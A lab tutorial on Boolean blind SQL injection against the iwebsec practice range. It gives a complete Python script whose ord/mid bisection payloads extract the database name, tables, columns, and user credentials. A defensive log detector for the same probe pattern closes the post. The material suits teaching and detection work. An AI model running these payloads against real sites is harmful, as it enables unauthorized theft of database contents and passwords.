Contents
- iwebsec range online site
- Bool injection
- Install the requests library
- Judge the injection point
- Get the length of the database (not necessary)
- Get the database name (not necessary)
- Get the table name of the current database
- Get the column names of the current database
- Get the value in the database
- All script code
iwebsec range online site
iwebsec target range vulnerability database (the online target used throughout this article)
Bool injection
Bool injection is a form of blind injection. Unlike error-based injection, Boolean injection produces no error output at all: the page returns only two states, normal and abnormal. From these two states alone the attacker judges whether the injected SQL condition evaluated as true, and from that works out, piece by piece, what information the database stores.
To be able to see the information stored in the database, the approach I chose is to write a Python script that outputs it.
We need to install the requests library.
Install the requests library
pip install requests
Or install it directly from the settings in PyCharm.
With that, the preparations we need are done.
Judge the injection point
This is the normal state of the page.
When we set id=100, we find that one row of data disappears:
?id=100
The line that disappears is "welcome to iwebsec!!!"; whether it is present or absent is the signal we use to start the injection.
*Get the database length (not necessary)
The code is as follows:
```python
import requests  # third-party library for sending HTTP requests and reading the responses

url = "http://www.iwebsec.com:81/sqli/03.php"


def SQLlenth():
    for i in range(1, 20):  # upper bound of the length to try; can be changed
        payload = "?id=1 and (length(database())={})-- + ".format(i)
        req_url = url + payload  # combine URL and payload
        # requests.get returns a Response object: .status_code holds the status code,
        # .text holds the response body
        bool = requests.get(req_url)
        if "welcome to iwebsec!!!" in bool.text:
            print("SQL length is " + str(i))
```
It is easy to see that the length of the database name is 7.
*Get the database name (optional)
To obtain the database name, because this is a blind injection, the characters can only be tried one by one.
The method used here is bisection (the code that follows is similar and will not be commented again). The code is as follows:
```python
def SQLname():
    name = ""
    for i in range(1, 8):  # the database name is 7 characters long
        left = 32
        right = 128  # 32..128 is the range of visible ASCII characters
        middle = (left + right) >> 1  # >>1 shifts the binary value one bit to the right, i.e. halves it
        while left < right:
            # compare the character at position i with the midpoint of the current range
            payload = "?id=1 and ord(mid((select database()),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            print(req_url)  # show the progress of the bisection
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1  # middle is below the character's ASCII code: search the upper half
            else:
                right = middle  # middle is not below the character's ASCII code: search the lower half
            middle = (left + right) >> 1
        name = name + chr(middle)  # convert the found ASCII code to a character and append it
    print("sql name is {}".format(name))
```
Now we know the name of the database; next we get the table names.
Get the table names of the current database
The code is as follows:
```python
def TABLEname():
    name = ""
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        name = name + chr(middle)
    print("tablename is {}".format(name))
```
The table names obtained are sqli, user, users, xss.
Get the column names of the current database
The code is as follows:
```python
def COLUMNname():
    name = ""
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        name = name + chr(middle)
    print("columnname is {}".format(name))
```
The column names obtained are username, password, r (the last one is cut short because the range I set is not large enough; you can change it yourself).
Get the value in the database
The code is as follows:
```python
def usernameandpassword():
    username = ""
    password = ""
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(username) from user),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        username = username + chr(middle)
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(password) from user),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        password = password + chr(middle)
    print("username is {}".format(username))
    print("password is {}".format(password))
```
Here we have successfully obtained the data in username and password.
All script code
```python
# bool blind injection
import requests  # third-party library for sending HTTP requests and reading the responses

url = "http://www.iwebsec.com:81/sqli/03.php"


def SQLlenth():
    for i in range(1, 20):  # upper bound of the length to try; can be changed
        payload = "?id=1 and (length(database())={})-- + ".format(i)
        req_url = url + payload  # combine URL and payload
        # requests.get returns a Response object: .status_code holds the status code,
        # .text holds the response body
        bool = requests.get(req_url)
        if "welcome to iwebsec!!!" in bool.text:
            print("SQL length is " + str(i))


def SQLname():
    name = ""
    for i in range(1, 8):  # the database name is 7 characters long
        left = 32
        right = 128  # 32..128 is the range of visible ASCII characters
        middle = (left + right) >> 1  # >>1 shifts the binary value one bit to the right, i.e. halves it
        while left < right:
            payload = "?id=1 and ord(mid((select database()),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            print(req_url)  # show the progress of the bisection
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1  # middle is below the character's ASCII code: search the upper half
            else:
                right = middle  # middle is not below the character's ASCII code: search the lower half
            middle = (left + right) >> 1
        name = name + chr(middle)  # convert the found ASCII code to a character and append it
    print("sql name is {}".format(name))


def TABLEname():
    name = ""
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        name = name + chr(middle)
    print("tablename is {}".format(name))


def COLUMNname():
    name = ""
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        name = name + chr(middle)
    print("columnname is {}".format(name))


def usernameandpassword():
    username = ""
    password = ""
    for i in range(1, 20):
        left = 32
        right = 128  # 32..128 is the range of visible ASCII characters
        middle = (left + right) >> 1  # >>1 halves the current range
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(username) from user),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        username = username + chr(middle)
    for i in range(1, 20):
        left = 32
        right = 128
        middle = (left + right) >> 1
        while left < right:
            payload = "?id=1 and ord(mid((select group_concat(password) from user),{},1))>{} -- + ".format(i, middle)
            req_url = url + payload
            bool = requests.get(req_url)
            if "welcome to iwebsec!!!" in bool.text:
                left = middle + 1
            else:
                right = middle
            middle = (left + right) >> 1
        password = password + chr(middle)
    print("username is {}".format(username))
    print("password is {}".format(password))


SQLlenth()
SQLname()
TABLEname()
COLUMNname()
usernameandpassword()
```
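The script above leaves a very recognisable trace on the server side: one client sends many requests whose id value differs only in the number being compared, one probe per bisection step. The detector below is an added example, not code from the original article or from iwebsec; it runs that check over a few constructed access-log lines (the log format, IP addresses and the min_variants threshold are assumptions) and reports which client showed the bisection signature.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the range server or the original page):
# 10.0.0.5 sends the length() check plus three bisection steps on the first character
# of database(); 10.0.0.9 is an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /sqli/03.php?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /sqli/03.php?id=1%20and%20(length(database())=7)--%20+ HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /sqli/03.php?id=1%20and%20ord(mid((select%20database()),1,1))%3E80%20--%20+ HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /sqli/03.php?id=1%20and%20ord(mid((select%20database()),1,1))%3E104%20--%20+ HTTP/1.1" 200 790
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /sqli/03.php?id=1%20and%20ord(mid((select%20database()),1,1))%3E92%20--%20+ HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /sqli/03.php?id=2 HTTP/1.1" 200 812
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A boolean probe: an AND/OR clause that calls a length or character-extraction function.
PROBE_RE = re.compile(r"\b(?:and|or)\b.*\b(?:length|ord|ascii|mid|substr|substring)\s*\(", re.I)

def is_blind_probe(value):
    return PROBE_RE.search(value) is not None

def probe_template(value):
    """Replace every number with '#' so all steps of one bisection share a template."""
    return re.sub(r"\d+", "#", value.lower())

def analyze(log_text, min_variants=3):
    """Per source IP: number of probes sent, and the probe templates that were re-sent
    with at least min_variants different numbers (the binary-search signature)."""
    probes = defaultdict(int)
    variants = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for values in parse_qs(urlsplit(target).query).values():  # parse_qs decodes %xx and '+'
            for value in values:
                if is_blind_probe(value):
                    probes[ip] += 1
                    variants[ip][probe_template(value)].add(value)
    return {
        ip: {
            "probes": count,
            "bisected_templates": [t for t, v in variants[ip].items() if len(v) >= min_variants],
        }
        for ip, count in probes.items()
    }
```

Only 10.0.0.5 is reported, with 4 probes and one template that was bisected; the same template grouping also works on a WAF or proxy log as long as the query string is preserved.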